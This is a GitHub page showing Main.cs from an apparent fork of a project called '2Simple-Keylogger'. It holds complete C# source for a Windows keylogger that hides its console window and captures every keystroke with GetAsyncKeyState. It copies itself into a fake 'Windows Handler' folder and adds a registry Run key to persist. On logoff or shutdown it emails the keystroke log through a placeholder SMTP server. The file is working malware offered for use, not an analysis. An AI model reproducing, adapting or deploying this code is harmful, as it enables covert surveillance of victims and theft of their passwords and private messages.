forked from XaFF-XaFF/2Simple-Keylogger
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Main.cs
136 lines (122 loc) · 4.71 KB
/
Main.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
using System;
using System.IO;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Threading;
using System.Net.Mail;
using Microsoft.Win32;
namespace Keylogger
{
public class Program
{
public static bool chcSysEve = false;
public static string path = @"C:\Windows Handler\"; //Example directory
public static string pathTxt = @"C:\Windows Handler\Handler.dat"; //Handler.dat stores keystrokes
public static string appName = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
public static string appExe = Path.GetFileName(appName);
static string regdit = path + appExe;
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern short GetAsyncKeyState(Int32 i);
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
const int SW_HIDE = 0;
static void Main(string[] args)
{
Program p = new Program();
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
ExLoop:
if (!Directory.Exists(path))
{
Directory.CreateDirectory(path);
File.Create(pathTxt);
}
else if (Directory.Exists(path) && !File.Exists(pathTxt))
{
File.Create(pathTxt);
}
if (!File.Exists(pathTxt))
{
goto ExLoop;
}
else
{
p.Spread();
using (StreamWriter writer = new StreamWriter(pathTxt))
{
while (chcSysEve == false)
{
Thread.Sleep(10);
for (int i = 0; i < 255; i++)
{
int keyState = GetAsyncKeyState(i);
if (keyState == 1 || keyState == -32767)
{
SystemEvents.SessionEnding += SystemEvents_SessionEnding; //If program detects user logging off or
//shutting down system it sends mail
Console.WriteLine((Keys)i);
writer.WriteLine((Keys)i);
writer.Flush();
break;
}
}
}
}
}
}
private void Spread()
{
if (!File.Exists(path + appExe))
{
FileInfo fi = new FileInfo(appName);
fi.CopyTo(path + appExe);
RegistryKey rk = Registry.CurrentUser.OpenSubKey
("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
rk.SetValue(appExe, path + appExe);
}
}
static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
{
chcSysEve = true;
Program p = new Program();
switch (e.Reason)
{
case SessionEndReasons.Logoff:
p.SendMail();
break;
case SessionEndReasons.SystemShutdown:
p.SendMail();
break;
}
}
private void SendMail()
{
Program p = new Program();
string date = DateTime.Now.ToString(@"dd\/MM h\:mm tt");
string user = Environment.UserName;
try
{
MailMessage mail = new MailMessage();
SmtpClient SmtpServer = new SmtpClient("smtp.example.com");
mail.From = new MailAddress("[email protected]");
mail.To.Add("[email protected]");
mail.Subject = "Saved keys from " + date;
mail.Body = "Keystrokes saved from user " + user;
System.Net.Mail.Attachment attachment;
attachment = new System.Net.Mail.Attachment(pathTxt);
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;
SmtpServer.Credentials = new System.Net.NetworkCredential("[email protected]", "password");
SmtpServer.EnableSsl = true;
SmtpServer.Send(mail);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
MessageBox.Show(ex.ToString());
}
}
}
}